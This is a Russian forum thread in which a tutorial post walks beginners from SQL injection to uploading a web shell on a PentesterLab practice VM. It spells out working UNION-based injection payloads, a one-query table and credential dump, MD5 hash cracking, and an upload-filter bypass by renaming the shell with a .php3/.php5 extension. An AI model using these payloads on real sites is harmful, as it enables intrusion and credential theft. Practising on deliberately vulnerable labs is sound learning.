PDA

Просмотр полной версии : От SQL иньекции до WebShell-a(Для новичков!!!)


Mister_Bert0ni
28.05.2015, 22:07
Тем кто в теме врятли что то новое увидет здесь.Поэтому гамнокритика мне не нужна в коментах.Хотите срать - срите в отведенных для этого местах.

И так сегодня наша тема "От SQL иньекции до WebShell-а"

Будем учиться на тренировачной площадке - я скачал ее с


https://pentesterlab.com/exercises/from_sqli_to_shell

Для видео ее будет достотачно.

И так начнем.

Первое что нам нужно найти уязвимый параметр.В нашем случае это параметр id.


http://192.168.8.131/cat.php?id=1'

Теперь пробуем сбалансировать запрос:


http://192.168.8.131/cat.php?id=1-- -

Ищем количество столбцов:

Находим:


http://192.168.8.131/cat.php?id=1 order by 4-- -

Ищем уязвимые столбцы:


http://192.168.8.131/cat.php?id=.1 union select 1,2,3,4 -- -

Проверимь базу,версию,


http://192.168.8.131/cat.php?id=.1 union select 1,concat(database(),0x20,version()),3,4-- -

Ищем админку:

Нашли


http://192.168.8.131/admin

Будем пробовать получить доступ к админке...

Пробуем разкрутить скуль и получить login pass админа.

Для экономии времени я буду юзать DIOS (Dump In One Shot) c помощью которого можно быстро получить список всех таблиц в один запрос:


make_set(6,@:=0x0a,(select(1)from(information_sche ma.columns)where@:=make_set(511,@,0x3a,table_schem a,0x3c6c693e,table_name,column_name)),@)

И так наш запрос будет следующим:


http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(informa tion_schema.columns)where@:=make_set(511,@,0x3a,ta ble_schema,0x3c6c693e,table_name,column_name)),@)) ,3,4-- -

Ищем таблицу с юзерами...

таблица: users , колонки: login и password

получим даные с этих столбцов:


http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(users)w here@:=make_set(511,@,0x3a,login,0x203a3a3a20,pass word)),@)),3,4-- -

Получили логин:admin и пароль в хэше:8efe310f9ab3efeae8d410a8e0166eb2

Первым делом идем на первый онлайн сервис по расшифровки хэша:

В моем случае это:


http://hashkiller.co.uk/md5-decrypter.aspx

пробуем расшифровать наш хэш:

Нам повезло)) Пароль расшифрован)

Пароль4ssw0rd

Итак идем в админку.

Зашли и ищем там страницу для загрузки контента(картники,новости, узыку и т.д...)


http://192.168.8.131/admin/new.php

ПРобуем загрузить наш шелл...

Говорит NO PHP! (((

Ну ничего,есть много способов обхода этого фильтра.Сейчас я о них рассказивать не буду - для этого я поже сниму отдельное видео по этой теме..

Для обхода этого фильтра в нашей ситуации достаточно переименовать наш shell.php в shell.php3 или shell.php4 или shell.php5

И так пробуем:

Ура мы залились)

Всем спасибо )) С вами был Mister_Bert0ni)

Cthulchu
28.05.2015, 22:20
очень мило, хороший мануал. Хороший не потому, что ново, а потому, что практика. Практика - большая проблема для новичков. Огромная. Таким образом, выживают только те, кому не жаль времени на бесконечный поиск жертв под определенные уязвимости без дорков.

А тут - на тебе, бесплатный полигон на локалхосте. И не надо думать о логах.

А эта тренировочная площадка - это типа сайтик с заведомо известными уязвимостями? ставится на вамп? Чего это у тебя там восьмая подсеть на локалхосте?

В общем, мне кажется, статью стоит дополнить (может, накидать других вариантов по тренировке на локалхосте) и можно в избранное постить.

.SpoilerTarget" type="button">Spoiler: оффтоп
ЗЫ

хыхы

http://i.imgur.com/BvFiGVb.png
ну вы поняли.

Mister_Bert0ni
28.05.2015, 22:26
Спасибо за одобрение)

Буду стараться еще подобные посты делать.

BabaDook
31.05.2015, 03:38
https://www.pentesterlab.com/exercises/

Он в целом классный рессурс. Именно та я 'пощупал' shellshock . К сожалению в реальных условиях нет